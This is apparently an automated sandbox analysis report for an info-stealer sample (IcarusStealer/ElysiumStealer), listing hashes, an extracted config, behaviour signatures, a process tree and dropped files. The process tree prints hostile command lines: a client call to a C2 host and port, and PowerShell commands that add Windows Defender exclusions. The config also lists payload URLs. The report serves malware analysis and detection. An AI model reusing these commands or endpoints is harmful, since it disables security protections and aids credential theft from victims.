Analysis

  • max time kernel
    149s
  • max time network
    150s
  • platform
    windows10-2004_x64
  • resource
    win10v2004-20240226-en
  • resource tags

    arch:x64arch:x86image:win10v2004-20240226-enlocale:en-usos:windows10-2004-x64system
  • submitted
    28-02-2024 04:29

General

  • Target

    Icarus/ICARUS.exe

  • Size

    9.0MB

  • MD5

    9cc1ab88f9d504b9b7ba86060536591f

  • SHA1

    8ca6f1b2d9b495dbdee0d7439b1e8febbfd708a9

  • SHA256

    5eec574e6fb9257cc3d7cceb3d1feae2b96355ccbd0c5b5357458a905e7aea75

  • SHA512

    2a26448d267b4b5611658fee597076c899a5845d00581c27d7742b0a110d5bbdc2bfd4d62702cc1a1b12cbca631e8b5b34107320061282fc239e760a00525a89

  • SSDEEP

    196608:yeUedsYnK7Q7CE2Zi45lO4nftv0cuaPdvrqt8l1ra8WcnqhbWf1FD6xz:gedlK7emHtnuarlpnqhbWfD6F

Malware Config

Extracted

Family

icarusstealer

Attributes
  • payload_url

    https://blackhatsec.org/add.jpg

    https://blackhatsec.org/remove.jpg

Signatures

  • ElysiumStealer

    ElysiumStealer (previously known as ZeromaxStealer) is an info stealer that can steal login credentials for various accounts.

  • ElysiumStealer Support DLL 1 IoCs
  • IcarusStealer

    Icarus is a modular stealer written in C# First adverts in July 2022.

  • Modifies Installed Components in the registry 2 TTPs 1 IoCs
  • Checks computer location settings 2 TTPs 1 IoCs

    Looks up country code configured in the registry, likely geofence.

  • Executes dropped EXE 2 IoCs
  • Loads dropped DLL 1 IoCs
  • Enumerates connected drives 3 TTPs 2 IoCs

    Attempts to read the root path of hard drives other than the default C: drive.

  • Legitimate hosting services abused for malware hosting/C2 1 TTPs 2 IoCs
  • Looks up external IP address via web service 1 IoCs

    Uses a legitimate IP lookup service to find the infected system's external IP.

  • Suspicious use of SetThreadContext 1 IoCs
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • Checks SCSI registry key(s) 3 TTPs 22 IoCs

    SCSI information is often read in order to detect sandboxing environments.

  • Modifies Internet Explorer settings 1 TTPs 10 IoCs
  • Modifies registry class 64 IoCs
  • Suspicious behavior: EnumeratesProcesses 7 IoCs
  • Suspicious behavior: GetForegroundWindowSpam 1 IoCs
  • Suspicious use of AdjustPrivilegeToken 30 IoCs
  • Suspicious use of FindShellTrayWindow 52 IoCs
  • Suspicious use of SendNotifyMessage 23 IoCs
  • Suspicious use of SetWindowsHookEx 6 IoCs
  • Suspicious use of WriteProcessMemory 34 IoCs

Processes

  • C:\Users\Admin\AppData\Local\Temp\Icarus\ICARUS.exe
    "C:\Users\Admin\AppData\Local\Temp\Icarus\ICARUS.exe"
    1⤵
    • Checks computer location settings
    • Suspicious use of WriteProcessMemory
    PID:1948
    • C:\Users\Admin\AppData\Local\Temp\ICARUS.exe
      "C:\Users\Admin\AppData\Local\Temp\ICARUS.exe"
      2⤵
      • Executes dropped EXE
      • Loads dropped DLL
      • Suspicious behavior: GetForegroundWindowSpam
      • Suspicious use of FindShellTrayWindow
      PID:348
    • C:\Users\Admin\AppData\Local\Temp\zerosmenu.exe
      "C:\Users\Admin\AppData\Local\Temp\zerosmenu.exe"
      2⤵
      • Executes dropped EXE
      • Suspicious use of SetThreadContext
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of AdjustPrivilegeToken
      • Suspicious use of WriteProcessMemory
      PID:3232
      • C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe
        "C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\saqryteu\saqryteu.cmdline"
        3⤵
        • Suspicious use of WriteProcessMemory
        PID:3808
        • C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe
          C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RES46FC.tmp" "c:\Users\Admin\AppData\Local\Temp\CSC24E2C96183C34A8DA847565C8410877F.TMP"
          4⤵
            PID:2984
        • C:\Windows\explorer.exe
          "C:\Windows\explorer.exe"
          3⤵
          • Modifies Installed Components in the registry
          • Enumerates connected drives
          • Checks SCSI registry key(s)
          • Modifies registry class
          • Suspicious use of AdjustPrivilegeToken
          • Suspicious use of FindShellTrayWindow
          • Suspicious use of SendNotifyMessage
          PID:1112
        • C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe
          "C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe" ICARUS_Client case-shield.gl.at.ply.gg 26501 PUGlcQLxe
          3⤵
          • Suspicious use of AdjustPrivilegeToken
          • Suspicious use of WriteProcessMemory
          PID:1844
          • C:\Windows\SysWOW64\cmd.exe
            "C:\Windows\System32\cmd.exe" /k start /b powershell -inputformat none -outputformat none -NonInteractive -Command Add-MpPreference -ExclusionPath C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe & exit
            4⤵
            • Suspicious use of WriteProcessMemory
            PID:4516
            • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
              powershell -inputformat none -outputformat none -NonInteractive -Command Add-MpPreference -ExclusionPath C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe
              5⤵
              • Suspicious behavior: EnumeratesProcesses
              • Suspicious use of AdjustPrivilegeToken
              PID:4992
          • C:\Windows\SysWOW64\cmd.exe
            "C:\Windows\System32\cmd.exe" /k start /b powershell -inputformat none -outputformat none -NonInteractive -Command Add-MpPreference -ExclusionPath cvtres.exe & exit
            4⤵
            • Suspicious use of WriteProcessMemory
            PID:4764
            • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
              powershell -inputformat none -outputformat none -NonInteractive -Command Add-MpPreference -ExclusionPath cvtres.exe
              5⤵
              • Suspicious behavior: EnumeratesProcesses
              • Suspicious use of AdjustPrivilegeToken
              PID:1716
    • C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe
      "C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe" -ServerName:App.AppXywbrabmsek0gm3tkwpr5kwzbs55tkqay.mca
      1⤵
      • Modifies registry class
      • Suspicious use of SetWindowsHookEx
      PID:2824
    • C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe
      "C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe" -ServerName:CortanaUI.AppX8z9r6jm96hw4bsbneegw0kyxx296wr9t.mca
      1⤵
      • Modifies Internet Explorer settings
      • Modifies registry class
      • Suspicious use of SetWindowsHookEx
      PID:3976
    • C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe
      "C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe" -ServerName:CortanaUI.AppX8z9r6jm96hw4bsbneegw0kyxx296wr9t.mca
      1⤵
      • Modifies Internet Explorer settings
      • Modifies registry class
      • Suspicious use of SetWindowsHookEx
      PID:2784
    • C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe
      "C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe" -ServerName:CortanaUI.AppX8z9r6jm96hw4bsbneegw0kyxx296wr9t.mca
      1⤵
      • Modifies Internet Explorer settings
      • Modifies registry class
      • Suspicious use of SetWindowsHookEx
      PID:3868
    • C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe
      "C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe" -ServerName:CortanaUI.AppX8z9r6jm96hw4bsbneegw0kyxx296wr9t.mca
      1⤵
      • Modifies Internet Explorer settings
      • Modifies registry class
      • Suspicious use of SetWindowsHookEx
      PID:4252
    • C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe
      "C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe" -ServerName:CortanaUI.AppX8z9r6jm96hw4bsbneegw0kyxx296wr9t.mca
      1⤵
      • Modifies Internet Explorer settings
      • Modifies registry class
      • Suspicious use of SetWindowsHookEx
      PID:2364

    Network

    MITRE ATT&CK Enterprise v15

    Replay Monitor

    Loading Replay Monitor...

    Downloads

    • C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\powershell.exe.log

      Filesize

      2KB

      MD5

      3d086a433708053f9bf9523e1d87a4e8

      SHA1

      b3ab5d4f282a4c8fe8c3005b8a557ed5a0e37f28

      SHA256

      6f8fd1b8d9788ad54eaeee329232187e24b7b43393a01aeba2d6e9675231fb69

      SHA512

      931ae42b4c68a4507ff2342332b08eb407050d47cf4176137ea022d0f6e513c689e998445a04c6d18d4877391705c586bfce0234632b898d41aaed0957996dfd

    • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

      Filesize

      16KB

      MD5

      46915cb161326aacc8e768a70723a5cc

      SHA1

      76af8d48b12637b11d822e95d6207467ea3a6608

      SHA256

      1b1182d72f061d4f5dd24057c40d5e845437e5bace0e7a362db8698c32f1b934

      SHA512

      549d849b79a9b8b513b4a7bfc473556fbc77befaf8027438f69c54cb0d5d570a4bf86854ca828936dad76a9e2f6eb871a0a44e84124981c9274b73691489c9c9

    • C:\Users\Admin\AppData\Local\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\LocalState\DeviceSearchCache\AppCache133535682321792218.txt

      Filesize

      74KB

      MD5

      80dffedad36ef4c303579f8c9be9dbd7

      SHA1

      792ca2a83d616ca82d973ece361ed9e95c95a0d8

      SHA256

      590ca4d2f62a7864a62ccb1075c55191f7f9d5c5304ea3446961bb50f9e3916e

      SHA512

      826b97a4de7c765f8f5ebc520960f68381fd9f4bfe68c2fbe46c6118110c9c14a87dcb8ed8102e60a954b4b3c408f72e7a93fd96317be3d51120a2ddd2faa3ea

    • C:\Users\Admin\AppData\Local\Packages\microsoft.windows.search_cw5n1h2txyewy\AC\Microsoft\Internet Explorer\DOMStore\1SA07OI6\microsoft.windows[1].xml

      Filesize

      97B

      MD5

      fb9854a5b056cc3d006b38bf0eab1b7c

      SHA1

      0a2b0432e2e9938be1f652c2247827e47b265f44

      SHA256

      3d454d15255bb82fb8a4cfa40ea848af32395be899aaaf83b6d626a814aa21c2

      SHA512

      20366182bf5a658b19e3df4eef2fa4e484bdcecc85a893834fbcb2b0ab64100a7694c3dbbdf1597bf3e3a747ede6fe7b81aab5f07653ef40a515edbef90ed00d

    • C:\Users\Admin\AppData\Local\Temp\ICARUS.exe

      Filesize

      8.5MB

      MD5

      e6a620574c5dc9ce58e154d70c1d9554

      SHA1

      8393b760d657ab39d92a43070d75be25c315b8c9

      SHA256

      e7a1e22275898facd79c2dd59f2be158317ae44cb7eb661a3b7e0f351f0c8a4c

      SHA512

      5b4deaad005c9145dbda58859ea5063e081339c6fe5c21069c0eedaf0bac1fbda501bd5c10b13b8c7e4c860a5456f8f03c5bc95cda1a6094b215eada542522ce

    • C:\Users\Admin\AppData\Local\Temp\RES46FC.tmp

      Filesize

      1KB

      MD5

      81c8343c7b31c64f897a1b7af7b69acd

      SHA1

      faa9b8fad5734b55ea9fca99cc6324bdc956b675

      SHA256

      3e4e173109f709766260c8e178af549f019bdc51cbe365ec0ac26722ba428614

      SHA512

      0c177df64caeb192666f15936f5eb06102adc87f5d1057aeab0a5c9019f6fc56b54edde8751ed6779da71cc51c73fa7f0d62f77b28c533eff1696a8b8f516e09

    • C:\Users\Admin\AppData\Local\Temp\Runtime.MSIL.1.0.0.0\NativePRo.dll

      Filesize

      40KB

      MD5

      94173de2e35aa8d621fc1c4f54b2a082

      SHA1

      fbb2266ee47f88462560f0370edb329554cd5869

      SHA256

      7e2c70b7732fb1a9a61d7ce3d7290bc7b31ea28cbfb1dbc79d377835615b941f

      SHA512

      cadbf4db0417283a02febbabd337bf17b254a6eb6e771f8a553a140dd2b04efd0672b1f3175c044a3edd0a911ce59d6695f765555262560925f3159bb8f3b798

    • C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_hrqocuaw.cwd.ps1

      Filesize

      60B

      MD5

      d17fe0a3f47be24a6453e9ef58c94641

      SHA1

      6ab83620379fc69f80c0242105ddffd7d98d5d9d

      SHA256

      96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

      SHA512

      5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

    • C:\Users\Admin\AppData\Local\Temp\zerosmenu.exe

      Filesize

      494KB

      MD5

      5b501f6a25d9720666a3fbac70be4553

      SHA1

      ccc9472434521c525fb1b9177cb57a9e239784a5

      SHA256

      bc7b8867a7a25e284b7cdab744e0c3d07ee2a9dac3694ed89bb859d30d9b4220

      SHA512

      bc7ad1625aba2cd1842e6d768833602803af70f435cf73630e34a2e8bc430722552874cc575ed34bd7cc2b718eb256814ed6e10297e2d99bd8e1d7d01265af45

    • C:\Users\Admin\AppData\Roaming\temp0923

      Filesize

      10B

      MD5

      1d8e61ef478fcd97c6371f930103b99d

      SHA1

      85a8841c0ce8f78943df8cb7af318c6e4b4c94bf

      SHA256

      7cc9a70e8e6bf97d6bf1235a57a9d99dd24571f1f12af4010abe76901e408feb

      SHA512

      e8998ce97f8f8f2f1ed8564c2769c07886e43d1d80339d40b8b536a52b6d993de60ea466fee4d764af5beddd59f10f9b9ec79d3f530fe6f4d537e1fed5a1c4da

    • \??\c:\Users\Admin\AppData\Local\Temp\CSC24E2C96183C34A8DA847565C8410877F.TMP

      Filesize

      1KB

      MD5

      e9144225655a1177485a6238f397718e

      SHA1

      0618d989814312c38b8005fc469222f891470642

      SHA256

      f2ff3d3919bf3120bd18978b0225c56b53eec3a645493f7fe08344671cacb21d

      SHA512

      392b9684bc1c0d054a397bb8ed54bc682a59ea6c1c12abad5d70ec2f0065afec4645cae8c2672ec4571d5763397092388b944cd5c7582a4aa685ecd4e3a0c2a4

    • \??\c:\Users\Admin\AppData\Local\Temp\saqryteu\saqryteu.0.cs

      Filesize

      1KB

      MD5

      14846c9faaef9299a1bf17730f20e4e6

      SHA1

      8083da995cfaa0e8e469780e32fcff1747850eb6

      SHA256

      61bc7b23a430d724b310e374a67a60dd1e1f883c6dd3a98417c8579ba4973c1b

      SHA512

      549d99dbb7376d9d6106ad0219d6cf22eb70c80d54c9ad8c7d0b04a33d956515e55c9608ab6eec0733f2c23602867eb85b43e58200ded129958c7de7ed22efb1

    • \??\c:\Users\Admin\AppData\Local\Temp\saqryteu\saqryteu.cmdline

      Filesize

      448B

      MD5

      ae535251df269ae962a6880ca8062716

      SHA1

      5be711477acaa07442ddb8aa9ae03e7f92ab5834

      SHA256

      b4f487f0d434dbd0f1804d9698c6bde2b8638b8362da34a2da490d62ee50e108

      SHA512

      9c6068021ea99fc0ddad697db9856a270b45ca4900c42e1807add530a050ef9f83ecfcf51f5b15a35a5177a624acab96f121515209b7be561baafe4deb00b04d

    • memory/348-80-0x0000000005500000-0x0000000005510000-memory.dmp

      Filesize

      64KB

    • memory/348-63-0x0000000008030000-0x000000000841A000-memory.dmp

      Filesize

      3.9MB

    • memory/348-97-0x0000000075320000-0x0000000075AD0000-memory.dmp

      Filesize

      7.7MB

    • memory/348-32-0x0000000002D00000-0x0000000002D0C000-memory.dmp

      Filesize

      48KB

    • memory/348-33-0x0000000005500000-0x0000000005510000-memory.dmp

      Filesize

      64KB

    • memory/348-28-0x0000000000230000-0x0000000000AAE000-memory.dmp

      Filesize

      8.5MB

    • memory/348-263-0x0000000075320000-0x0000000075AD0000-memory.dmp

      Filesize

      7.7MB

    • memory/348-239-0x0000000005500000-0x0000000005510000-memory.dmp

      Filesize

      64KB

    • memory/348-261-0x0000000005500000-0x0000000005510000-memory.dmp

      Filesize

      64KB

    • memory/348-111-0x0000000005500000-0x0000000005510000-memory.dmp

      Filesize

      64KB

    • memory/348-26-0x0000000075320000-0x0000000075AD0000-memory.dmp

      Filesize

      7.7MB

    • memory/348-58-0x0000000005530000-0x000000000553A000-memory.dmp

      Filesize

      40KB

    • memory/1112-145-0x0000000003310000-0x0000000003311000-memory.dmp

      Filesize

      4KB

    • memory/1716-92-0x0000000006730000-0x000000000674E000-memory.dmp

      Filesize

      120KB

    • memory/1716-113-0x000000006FC20000-0x000000006FC6C000-memory.dmp

      Filesize

      304KB

    • memory/1716-126-0x00000000080F0000-0x000000000876A000-memory.dmp

      Filesize

      6.5MB

    • memory/1716-125-0x0000000005220000-0x0000000005230000-memory.dmp

      Filesize

      64KB

    • memory/1716-129-0x0000000007CC0000-0x0000000007D56000-memory.dmp

      Filesize

      600KB

    • memory/1716-130-0x0000000007C50000-0x0000000007C61000-memory.dmp

      Filesize

      68KB

    • memory/1716-128-0x0000000007AD0000-0x0000000007ADA000-memory.dmp

      Filesize

      40KB

    • memory/1716-131-0x0000000007C80000-0x0000000007C8E000-memory.dmp

      Filesize

      56KB

    • memory/1716-76-0x0000000075320000-0x0000000075AD0000-memory.dmp

      Filesize

      7.7MB

    • memory/1716-77-0x0000000005220000-0x0000000005230000-memory.dmp

      Filesize

      64KB

    • memory/1716-78-0x0000000005220000-0x0000000005230000-memory.dmp

      Filesize

      64KB

    • memory/1716-114-0x000000007F840000-0x000000007F850000-memory.dmp

      Filesize

      64KB

    • memory/1716-132-0x0000000007C90000-0x0000000007CA4000-memory.dmp

      Filesize

      80KB

    • memory/1716-141-0x0000000075320000-0x0000000075AD0000-memory.dmp

      Filesize

      7.7MB

    • memory/1844-51-0x0000000005970000-0x0000000005980000-memory.dmp

      Filesize

      64KB

    • memory/1844-162-0x0000000005970000-0x0000000005980000-memory.dmp

      Filesize

      64KB

    • memory/1844-50-0x0000000075320000-0x0000000075AD0000-memory.dmp

      Filesize

      7.7MB

    • memory/1844-124-0x0000000075320000-0x0000000075AD0000-memory.dmp

      Filesize

      7.7MB

    • memory/1844-49-0x0000000000400000-0x0000000000424000-memory.dmp

      Filesize

      144KB

    • memory/1948-0-0x0000000000F70000-0x000000000186C000-memory.dmp

      Filesize

      9.0MB

    • memory/1948-2-0x0000000002110000-0x0000000002120000-memory.dmp

      Filesize

      64KB

    • memory/1948-25-0x00007FFD04DB0000-0x00007FFD05871000-memory.dmp

      Filesize

      10.8MB

    • memory/1948-1-0x00007FFD04DB0000-0x00007FFD05871000-memory.dmp

      Filesize

      10.8MB

    • memory/2364-249-0x00000142CBD40000-0x00000142CBD60000-memory.dmp

      Filesize

      128KB

    • memory/2364-251-0x00000142CC150000-0x00000142CC170000-memory.dmp

      Filesize

      128KB

    • memory/2364-247-0x00000142CBD80000-0x00000142CBDA0000-memory.dmp

      Filesize

      128KB

    • memory/2784-185-0x00000174B3BE0000-0x00000174B3C00000-memory.dmp

      Filesize

      128KB

    • memory/2784-189-0x00000174B3FB0000-0x00000174B3FD0000-memory.dmp

      Filesize

      128KB

    • memory/2784-187-0x00000174B3BA0000-0x00000174B3BC0000-memory.dmp

      Filesize

      128KB

    • memory/3232-30-0x0000000075320000-0x0000000075AD0000-memory.dmp

      Filesize

      7.7MB

    • memory/3232-29-0x0000000000820000-0x00000000008A2000-memory.dmp

      Filesize

      520KB

    • memory/3232-34-0x0000000005190000-0x0000000005222000-memory.dmp

      Filesize

      584KB

    • memory/3232-53-0x0000000075320000-0x0000000075AD0000-memory.dmp

      Filesize

      7.7MB

    • memory/3232-36-0x0000000005040000-0x0000000005050000-memory.dmp

      Filesize

      64KB

    • memory/3232-31-0x00000000050F0000-0x000000000518C000-memory.dmp

      Filesize

      624KB

    • memory/3232-35-0x0000000006BF0000-0x0000000007194000-memory.dmp

      Filesize

      5.6MB

    • memory/3868-211-0x0000020CC6710000-0x0000020CC6730000-memory.dmp

      Filesize

      128KB

    • memory/3868-207-0x0000020CC6340000-0x0000020CC6360000-memory.dmp

      Filesize

      128KB

    • memory/3868-209-0x0000020CC6300000-0x0000020CC6320000-memory.dmp

      Filesize

      128KB

    • memory/3976-151-0x000001BD70210000-0x000001BD70230000-memory.dmp

      Filesize

      128KB

    • memory/3976-153-0x000001BD701D0000-0x000001BD701F0000-memory.dmp

      Filesize

      128KB

    • memory/3976-155-0x000001BD705E0000-0x000001BD70600000-memory.dmp

      Filesize

      128KB

    • memory/4252-230-0x000002D0C91F0000-0x000002D0C9210000-memory.dmp

      Filesize

      128KB

    • memory/4252-227-0x000002D0C8BE0000-0x000002D0C8C00000-memory.dmp

      Filesize

      128KB

    • memory/4252-225-0x000002D0C8E20000-0x000002D0C8E40000-memory.dmp

      Filesize

      128KB

    • memory/4992-109-0x0000000006CD0000-0x0000000006CEE000-memory.dmp

      Filesize

      120KB

    • memory/4992-140-0x0000000075320000-0x0000000075AD0000-memory.dmp

      Filesize

      7.7MB

    • memory/4992-134-0x0000000007D60000-0x0000000007D68000-memory.dmp

      Filesize

      32KB

    • memory/4992-133-0x0000000007D70000-0x0000000007D8A000-memory.dmp

      Filesize

      104KB

    • memory/4992-59-0x0000000005170000-0x00000000051A6000-memory.dmp

      Filesize

      216KB

    • memory/4992-61-0x0000000005160000-0x0000000005170000-memory.dmp

      Filesize

      64KB

    • memory/4992-127-0x0000000007A50000-0x0000000007A6A000-memory.dmp

      Filesize

      104KB

    • memory/4992-60-0x0000000075320000-0x0000000075AD0000-memory.dmp

      Filesize

      7.7MB

    • memory/4992-93-0x0000000006C60000-0x0000000006CAC000-memory.dmp

      Filesize

      304KB

    • memory/4992-62-0x00000000057E0000-0x0000000005E08000-memory.dmp

      Filesize

      6.2MB

    • memory/4992-110-0x0000000005160000-0x0000000005170000-memory.dmp

      Filesize

      64KB

    • memory/4992-64-0x0000000005F90000-0x0000000005FB2000-memory.dmp

      Filesize

      136KB

    • memory/4992-65-0x0000000006040000-0x00000000060A6000-memory.dmp

      Filesize

      408KB

    • memory/4992-79-0x0000000006290000-0x00000000065E4000-memory.dmp

      Filesize

      3.3MB

    • memory/4992-112-0x00000000079A0000-0x0000000007A43000-memory.dmp

      Filesize

      652KB

    • memory/4992-96-0x00000000076C0000-0x00000000076F2000-memory.dmp

      Filesize

      200KB

    • memory/4992-98-0x000000007F890000-0x000000007F8A0000-memory.dmp

      Filesize

      64KB

    • memory/4992-99-0x000000006FC20000-0x000000006FC6C000-memory.dmp

      Filesize

      304KB

    • memory/4992-75-0x0000000006220000-0x0000000006286000-memory.dmp

      Filesize

      408KB